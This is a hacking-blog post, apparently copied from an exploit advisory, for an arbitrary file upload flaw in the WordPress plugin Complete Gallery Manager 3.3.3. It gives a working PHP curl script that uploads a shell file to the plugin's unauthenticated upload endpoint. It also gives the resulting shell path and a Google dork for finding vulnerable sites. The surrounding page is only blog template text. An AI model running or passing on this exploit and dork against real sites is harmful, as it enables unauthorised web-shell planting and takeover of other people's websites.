Select Menu

Ads

Random Posts

Black-Ink. Diberdayakan oleh Blogger.

Metasploit

Web Pentest

Circle Gallery

" });

Our Chanel

Tutorial

Tools

» » » WP Complete Gallery Manager 3.3.3 - Arbitrary File Upload

Posted by: Black-Ink Posted date: 10.05 / comment : 0 











Proof of Concept (PoC):
=======================
The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or privileged application user account.
For demonstration or reproduce ...

Vuln page : 
http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php

Exploit : 

<?php
$uploadfile="up.php"; 
$ch = curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Upload Access Path : http://wordpress.localhost:8080/wp-content/2013/09/up.php

Google Dork: allinurl:/wp-content/plugins/complete-gallery-manager/


















Tagged with: 









About Black-Ink









WePress Theme is officially developed by Templatezy Team. We published High quality Blogger Templates with Awesome Design for blogspot lovers.The very first Blogger Templates Company where you will find Responsive Design  Templates.













 « 


Next
Posting Lebih Baru




 » 


Previous
Posting Lama














Tidak ada komentar
















 Leave a Reply


Biakan Jadi Pembaca Yang Tau berterima kasih  .... :D
Meski hanya dengan menulis kata Terima kasih ...




















        

      












Langganan:
Posting Komentar (Atom)






























Copyright © 2014 
Blogger Templates 
Designed By: Templatezy